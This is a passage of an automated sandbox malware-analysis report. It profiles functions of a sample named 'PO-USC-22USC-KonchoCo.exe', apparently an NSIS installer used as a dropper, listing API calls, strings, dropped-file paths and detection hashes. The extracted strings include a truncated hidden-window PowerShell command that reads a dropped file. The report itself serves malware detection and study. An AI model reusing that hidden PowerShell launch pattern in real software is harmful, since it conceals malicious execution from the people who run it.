Uniqueness

Uniqueness Score: -1.00%

Function 004069DF Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
FindClose.KERNEL32(00000000), ref: 004069F6

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00404102 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
ShowWindow.USER32(?), ref: 0040415E
GetWindowLongW.USER32(?,000000F0), ref: 00404170
ShowWindow.USER32(?,00000004), ref: 00404189
DestroyWindow.USER32 ref: 0040419D
SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
GetDlgItem.USER32(?,?), ref: 004041D5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
IsWindowEnabled.USER32(00000000), ref: 004041F0
GetDlgItem.USER32(?,00000001), ref: 0040429B
GetDlgItem.USER32(?,00000002), ref: 004042A5
SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404310
GetDlgItem.USER32(?,00000003), ref: 004043B6
ShowWindow.USER32(00000000,?), ref: 004043D7
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043E9
EnableWindow.USER32(?,?), ref: 00404404
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040441A
EnableMenuItem.USER32(00000000), ref: 00404421
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404439
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
SetWindowTextW.USER32(?,00422F48), ref: 0040448A
ShowWindow.USER32(?,0000000A), ref: 004045BE

Strings

H/B, xrefs: 00404466

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H/B
API String ID: 121052019-184950203
Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403D54 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3

lstrcatW.KERNEL32(1033,00422F48), ref: 00403DD5
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,74DF3420), ref: 00403E55
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
GetFileAttributesW.KERNEL32(: Completed), ref: 00403E73
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238), ref: 00403EBC

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

RegisterClassW.USER32(00428A00), ref: 00403EF9
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
ShowWindow.USER32(00000005,00000000), ref: 00403F7C
GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
RegisterClassW.USER32(00428A00), ref: 00403FBE
DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD

Strings

1033, xrefs: 00403D74, 00403DD0
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238, xrefs: 00403DE4, 00403DEC, 00403E8F, 00403E95, 00403EA5
.DEFAULT\Control Panel\International, xrefs: 00403DC0
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D59
: Completed, xrefs: 00403E1C, 00403E25, 00403E33, 00403E82, 00403E88
_Nb, xrefs: 00403ED8, 00403F40
RichEd20, xrefs: 00403F82
"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe", xrefs: 00403D57
RichEdit, xrefs: 00403FAF
H/B, xrefs: 00403D80
RichEdit20W, xrefs: 00403FA0, 00403FA6
.exe, xrefs: 00403E62
RichEd32, xrefs: 00403F90
Control Panel\Desktop\ResourceLocale, xrefs: 00403D88

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2229881518
Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D5 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030E9
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00403105

Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040314E
GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290

Strings

Null, xrefs: 004031CC
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe", xrefs: 004030DE
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
Inst, xrefs: 004031BA
C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
Error launching installer, xrefs: 00403125
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
soft, xrefs: 004031C3

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2451176394
Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004066BF Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004067E1
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406855
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406889
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00000000,00000000), ref: 004068E3

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406883
Completed, xrefs: 004066E3
Software\Microsoft\Windows\CurrentVersion, xrefs: 004067B2
"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A, xrefs: 004068B8
: Completed, xrefs: 004066EC, 004067A6, 004067AD, 004067B1, 004067CA, 004067CB, 004067E0, 004067F6, 00406827, 00406853, 00406888, 0040688E, 004068AB, 004068BE, 004068DC, 004068E2, 004068EB, 00406920

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-3929350441
Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

Uniqueness

Uniqueness Score: -1.00%

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A,"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A,00000000,00000000,"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes,?,?,00000031), ref: 004017DA

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Strings

distributed\Ristingets\, xrefs: 00401826, 00401844
afsmitningernes, xrefs: 0040183A, 00401856
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes, xrefs: 004017A3
"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes$afsmitningernes$distributed\Ristingets\
API String ID: 1941528284-2361279963
Opcode ID: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
Opcode Fuzzy Hash: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405707 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
SetWindowTextW.USER32(Completed,Completed), ref: 00405774
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Strings

Completed, xrefs: 00405728, 00405738, 0040573E, 00405761, 0040576D

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8

Strings

Times New Roman, xrefs: 00401EBE

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 9330b341f5ec5a6b3a5ee45025c1e4f07807d780444240919f5b9aad752ac9f7
Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
Opcode Fuzzy Hash: 9330b341f5ec5a6b3a5ee45025c1e4f07807d780444240919f5b9aad752ac9f7
Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED

Uniqueness

Uniqueness Score: -1.00%

Function 00406A06 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
wsprintfW.USER32 ref: 00406A58
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C

Strings

%s%S.dll, xrefs: 00406A52
UXTHEME, xrefs: 00406A0F

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
